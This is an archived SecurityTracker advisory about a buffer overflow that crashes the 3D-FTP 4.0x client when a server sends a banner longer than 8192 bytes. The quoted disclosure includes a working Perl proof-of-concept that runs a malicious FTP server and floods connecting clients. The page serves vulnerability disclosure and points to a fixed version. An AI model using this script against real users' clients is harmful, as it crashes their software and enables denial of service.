SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   3D-FTP Vendors:   SiteDesigner Technologies, Inc.
3D-FTP Client Can Be Crashed By a Remote Server Sending a Long Banner
SecurityTracker Alert ID:  1006659
SecurityTracker URL:  http://securitytracker.com/id/1006659
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 28 2003
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4.0x
Description:   A vulnerability was reported in the 3D-FTP FTP client software. A remote FTP server can cause the client to crash.

DWC Gr0up reported that a remote FTP server can send a long banner greater than 8192 bytes to the FTP client to cause the client to crash.

A demonstration exploit script is provided in the Source Message.

Impact:   A remote server can cause the client to crash when the client connects to the server.
Solution:   It is reported that version 6.0 is not affected. The new version is available at:

http://www.3dftp.com/download.htm

Vendor URL:  www.3dftp.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Buffer overflow in 3D-ftp


Product: 3D-ftp Client
Version: 4.0x
OffSite: http://www.sitegallery.net/
Problem: Remote buffer overflow
------------------------------------------

3D-ftp - Quite good Windows FTP Client. FTP Client have many opportunities

Remote buffer overflow will take place if server send long banner >= 8192
Client can not process these data and he is crash! 

Fix: Download new version.

Sample exploit in perl. For Crash 3D-ftp use: ftpbanex.pl 8193






#!/usr/bin/perl
########################################################
#
# Banner Buffer Overflow remote exploit in FTP Clients
#
#
#                by Over_G [DWC Gr0up]
#
#         www.dwcgr0up.com      www.overg.com
#########################################################
use IO::Socket;
$port = "21";
$data = "a";
$bsize = $ARGV[0];

print "\n  Banner Buffer Overflow remote exploit in FTP Clients\n\n";
print "           by Over G[DWC Gr0up]\n";
print "     www.dwcgr0up.com www.overg.com\n\n";

if (defined $bsize) {}
 else {
  print "Incorrect parameters.\n";
  die "Usage: perl ftpbanex.pl [buffer_size]\n";
}
print "Creating server...\n";
$buf .= $data x $bsize;
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create server.\n";
print "Awayting connections...\n";
while ($client = $server->accept())
{
 print "Client connected.\n";
 print "Attacking...";
 print $client "$buf";
 print "OK\n";
 close($client);
}





Greetz to: DHGroup, Gipshack.

www.overg.com www.dwcgr0up.com
regards, Over G[DWC Gr0up]



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC